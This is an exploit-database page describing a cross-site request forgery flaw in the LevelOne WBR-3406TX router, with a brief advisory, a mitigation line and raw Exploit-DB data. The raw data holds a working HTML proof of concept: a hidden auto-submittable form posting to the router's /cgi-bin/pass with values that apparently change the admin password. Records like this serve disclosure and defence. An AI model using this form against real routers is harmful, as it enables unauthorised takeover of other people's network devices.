header-logo
Suggest Exploit
vendor:
WBR-3406TX router
by:
SecurityFocus
8,8
CVSS
HIGH
Cross-Site Request-Forgery
352
CWE
Product Name: WBR-3406TX router
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

LevelOne WBR-3406TX router Cross-Site Request-Forgery Vulnerability

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. An attacker can craft a malicious HTML page that contains a form with hidden fields that will be submitted to the vulnerable router. The form contains the parameters 'rc', 'Pa', 'P1' and 'rd' with arbitrary values.

Mitigation:

Users are advised to apply the appropriate updates to help mitigate the risk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63908/info

LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR